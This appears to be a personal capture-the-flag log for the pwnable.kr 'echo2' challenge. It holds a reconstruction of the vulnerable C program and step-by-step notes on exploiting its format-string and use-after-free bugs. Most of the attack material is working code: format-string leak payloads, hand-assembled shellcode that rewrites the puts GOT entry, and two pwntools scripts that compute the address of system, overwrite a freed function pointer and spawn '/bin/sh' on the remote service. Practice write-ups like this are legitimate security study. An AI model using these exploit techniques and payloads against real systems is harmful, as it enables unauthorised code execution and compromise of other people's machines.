rdi, rsi, rdx, rcx
########################################################################

struct formalities{
	char name[24];
	void (*greeting)(char *);
	void (*farewell)(char *);
};

struct formalities *o;
char id[4];
void (*func[3])(void);

void get_input(char *buf, int size){
	fgets(buf, size, stdin);
}

void greetings(char *name){
	printf("hello %s\n", name);
}

void byebye(char *name){
	printf("goodbye %s\n", name);
}

void echo1(){
	puts("not supported");
}

void echo2(){
	char buff[32];
	o->greeting(o->name);
	get_input(buff, 32);
	printf(buff); // format string vulnerability
	o->farewell(o->name);
}

void echo3(){
	char *ptr;
	o->greeting(o->name);
	ptr = malloc(32);
	get_input(ptr, 32);
	puts(ptr);
	free(ptr);
	o->farewell(o->name);
}

void cleanup(){
	free(o); // uaf
}



int main(){
	char buff[24];
	unsigned int answer;
	setvbuf(stdout, NULL, _IONBF, 0);
	setvbuf(stdin, NULL, _IOLBF, 0);

	o = malloc(0x28); // or malloc(sizeof(struct formalities))
	o->greeting = greetings;
	o->farewell = byebye;

	printf("hey, what's your name? : ");
	scanf("%24s", buff);
	o->name[0...7] = buff[0...7];
	o->name[8...15] = buff[8...15];
	o->name[16...23] = buff[16...23];
	id[0...3] = buff[0...3];
	getchar();

	func[0] = echo1;
	func[1] = echo2;
	func[2] = echo3;
	answer = 0;

	while (1){
		puts("\n- select echo type -");
		puts("- 1 : BOF echo");
		puts("- 2 : FSB echo");
		puts("- 3 : UAF echo");
		puts("- 4 : exit");
		printf("> ");
	
		scanf("%d", &answer);
		getchar();

		if (answer < 4){
			func[answer - 1]();
		}
		else if (answer != 4){
			puts("invalid menu");
		}
		else{
			cleanup();
			printf("Are you sure you want to exit? (y/n) ");
			answer = getchar();
			if (answer != 'y'){
				continue;
			}
			break;
		}
	}
	
	
	
}

########################################################################

there is a uaf vulnerability here, first call cleanup function then call echo3 which will call malloc and allocate space (this only works if the previously freed space
is allocated that contains the function pointers, else it fails), we write the address of system into this space and also "/bin/sh" into the space for the name of struct,
this will give us shell access...

1. 0x603290 is the location of the chunk we allocated
2. went on to free then reallocate in echo3 and we got the chunk, this can work, just need to get address of system function

system is contained at offset 050d70
aslr randomized where the libc library is loaded so i need to use the format string vulnerability to leak the base of libc

0x125c12d1 0xfbad2288 0x125c12ef (nil) (nil) 0x7025702570257025 0x7025702570257025 0x7025702570257025 0xa702570257025 0x7ffcdcfa41c0 0x400acb (nil) 0x200000000 0x636469 (nil)

can put the address of a GOT entry into the print buffer then use the format string vuln with %s to print the contents of the GOT

0x00007ffff7e06e50

so 0x602008 is address of puts@got.plt

python2 -c "print('idc\n2\n\x08\x20\x60\x00\x00\x00\x00\x00%p%p%p%p%p %s \n4\ny\n')"


this command should work for leaking the address of puts:
python2 -c "print('idc\n2\n%p%p%p%p%p%p%p%p%saaaaaa\x08\x20\x60\x00\x00\x00\x00\x00\n4\ny\n')" | ./echo2
where puts will be the last pointer printed

testing to see if above payload works...

0x7ffff7e06e50
answer: 0x7ffff7e06e50
so correct and this payload works to leak address of puts

puts offset is 0x080e50 so we just need to subtract this from the leaked address we get, then add the system offset to it which is 0x050d70 and now we have the address of the
system function, now to do some more reasearch on the uaf part of the vulnerability...

found out i can only write to the 7 most least significant bytes of the function pointer to greeting but this shouldn't be a problem since the most significant byte
of system should be a null byte

so the steps of the exploit are as follows...

1. go to echo2 and leak the address of puts using the above method

2. calculate the address of system using the leaked address

3. fake quit the program to free the proper area of memory

4. go to echo3 to allocate the space that was previously freed and overwrite the previous greeting function with the address of system and the name member with "/bin/sh"

5. call either echo2 or echo3 to call system with "/bin/sh" as argument

6. achieve shell access and get key :)

now to just code this...

########################################################################
from pwn import *
import os

# Get the value of the PATH environment variable
# path_variable = os.environ.get('PATH')
# print(path_variable)
io = remote('localhost', 9011)

print(io.recvuntil(b': '))

io.send(b"idc\n")

print(io.recvuntil(b'> '))

puts_offset = 0x080e50
system_offset = 0x050d70

io.send(b"2\n")

payload = b"%p%p%p%p%p%p%p%p%saaaaaa\x08\x20\x60\x00\x00\x00\x00\x00\n"

print(io.recvuntil(b'\n'))
io.send(payload)

answer = io.recvuntil(b'\n')
puts_address = b""
switch = False
print(answer)
for i in range(4, len(answer)):
    if (answer[i-1] == b"5"[0] and answer[i-2] == b"2"[0] and answer[i-3] == b"3"[0] and answer[i-4] == b"7"[0]):
        switch = True
    if (answer[i] == b"a"[0] and switch):
        break
    if switch:
        puts_address = puts_address + answer[i].to_bytes(1, "little")


print("puts is: ", puts_address, puts_address.hex())
puts_address = puts_address[::-1].hex()
print(puts_address)
puts_address = int(puts_address, 16)
print(puts_address)
libc_base = puts_address - puts_offset
system_address = libc_base + system_offset

# print(io.recvuntil(b'> '))
io.send(b'4\n')
print(io.recvuntil(b'(y/n)'))
io.send(b'n\n')
print("here:", io.recvuntil(b'> '))
io.send(b"3\n")
payload = b'/bin/sh\0' + b'\0'*16 + p64(system_address) + b'\n'
# payload = b'/bin/sh\0' + b'\n'
print(payload[3])
io.send(payload)
print(io.recvuntil(b'> '))
io.send(b"3\n")
# print(io.recv(10))
io.interactive()



io.close()

# strlen_addr_int = int.from_bytes(strlen_addr, "little")
# libc_base = strlen_addr_int - strlen_offset
# system_addr = libc_base + system_offset # this is our solution

# io.send(p32(system_addr))

# print(io.recv())
########################################################################

x/16x 0x603290

Note that apparently free scrambles some memory at whatever pointer is given as argument (in my case it seems 16 bytes) so now idk wtf to do since name is overwritten, i need
to find another way, the tools i have at my disposial now is i can go to any piece of code i want now but i can't give that piece of code arguments. Can i call the get_input
function with a size value of something higher than 32???

I can insert shellcode into the initial buffer in main (aslong as there are no whitespace characters and such in the instruction) which then can handle the call to system maybe?

Ok found a potential solution that i think can work

1. put shellcode on the initial buffer that stores my name in main which will replace the got entry for puts with the address of the start of echo2 right before the call to
the formalities greeting member

2. use format string vulnerabilities to leak the address of the system function, and to also leak the address of the before mentioned buffer inside of main with the shell code

3. fake exit the program to initialize the freeing of the o variable

4. call echo2 and overwrite o's greeting method with the shellcode in the main buffer

5. call echo2 again which will execute said shellcode and replace puts got entry with the start of echo2, after this is done proceed to put /bin/sh in place of the name member
and the address of system in place of the greeting member function for the o variable, we will go back to the start of the function on executing of the puts call, then
we will loop back to the greeting call with the proper argument and function overwrite :)

6. get shell access and cat flag

found address on stack 0x7fffffffea20 while start of buffer is at 0x7fffffffea00 so just subtract 0x7fffffffea20 by 0x20 = 32 and we get location of buffer

%p%p%p%p%p%p%p%p%p aa %p aaaaaaa

seems to work for this task, just isolate address that is surrounded by a's then minus by 32 and we get address of buffer probably

insert the following shellcode...

push rbp
mov rbp, rsp
mov QWORD PTR [0x602008], 0x400828
leave
ret

where 0x602008 is address of got of puts and 0x400828 is address of echo2, compiling this into shellcode we get...

55 48 89 E5 48 C7 04 25 08 20 60 00 28 08 40 00 C9 C3 

which has a 20 in it because of the address of plt got, HAHAHAHAHAHAHHAHAHAHHAHAHAHAHAHHAHA
quick fix???

push rbp
mov rbp, rsp
mov rax, 0x601008
mov QWORD PTR 0X1000[rax], 0x400828
leave
ret

with shell code

55 48 89 E5 48 C7 C0 08 10 60 00 48 C7 80 00 10 00 00 28 08 40 00 C9 C3

which has 24 bytes exactly, problem is scanf adds null terminator and buffer is size 24, can fix this by doing...

mov rax, 0x601008
mov QWORD PTR 0X1000[rax], 0x400828
ret

which compiles as...

48 C7 C0 08 10 60 00 48 C7 80 00 10 00 00 28 08 40 00 C3
48C7C00810600048C7800010000028084000C3

which should be sufficient,
finished, flag is "w3_want_ex3cutable_5tack", worked with script...

##################################################
from pwn import *
import os
import re
import sys

io = None
ssh_connection = ssh(user="echo2", host='pwnable.kr', port=2222, password="guest")
if (len(sys.argv) > 1 and sys.argv[1] == "debug"):
    io = ssh_connection.process(["./echo2"])
    gdb.attach(io, """
    break echo3
    """)
else:
    io = ssh_connection.remote('localhost', 9011)

shellcode = b"\x48\xC7\xC0\x08\x10\x60\x00\x48\xC7\x80\x00\x10\x00\x00\x28\x08\x40\x00\xC3\n"
io.sendafter(b": ", shellcode)
io.recvuntil(b'> ')

puts_offset = 0x080e50
system_offset = 0x050d70

io.send(b"2\n")
payload = b"%p%p%p%p%p%p%p%p%saaaaaa\x08\x20\x60\x00\x00\x00\x00\n" # should end with a null byte

io.recvuntil(b'\n')
io.send(payload)

answer = io.recvuntil(b'\n')
print(answer)
puts_address = re.findall(b"7325[^a]*aaa", answer)[0]
puts_address = puts_address[4:len(puts_address)-3]
puts_address = puts_address[::-1].hex()
puts_address = int(puts_address, 16)
libc_base = puts_address - puts_offset
system_address = libc_base + system_offset
print("system address is:", hex(system_address))

print(io.recvuntil(b"> "))
io.send(b'2\n')
print(io.recvuntil(b'\n'))
payload = b'%p%p%p%p%p%p%p%p%p aa %p aaaaaa\n'
io.send(payload)
answer = io.recvuntil(b'\n')
print("answer is:", answer)
main_buffer = re.findall(b"a .* a", answer)[0]
main_buffer = main_buffer[2:len(main_buffer) - 2]
main_buffer = int(main_buffer, 16)
main_buffer = main_buffer - 0x20
print("main buffer is:", hex(main_buffer))


io.send(b'4\n')
print(io.recvuntil(b'(y/n)'))
print()
io.send(b'n\n')
print("here:", io.recvuntil(b'> '))
print()
io.send(b"3\n")
print(io.recvuntil(b'\n'))
print()
print("p64 main buffer is:", p64(main_buffer))
payload = b'\0'*24 + p64(main_buffer)
payload = payload[0:len(payload) - 1] + b"\n" # add newline at the end (thisll be replaced by null byte so it's fine)
io.send(payload)
print(io.recvuntil(b'\n'))
print()
print(io.recvuntil(b'> '))
print()
io.send(b"3\n")
print()
payload = b'/bin/sh\0' + b'\0'*16 + p64(system_address) + b'\n'
io.send(payload)
io.interactive()



io.close()
##################################################
though this is really messy since i have no experience with pwntools and has alot of debugging prints, will clean this up for practice with pwntools and make it more pleasant
to look at
















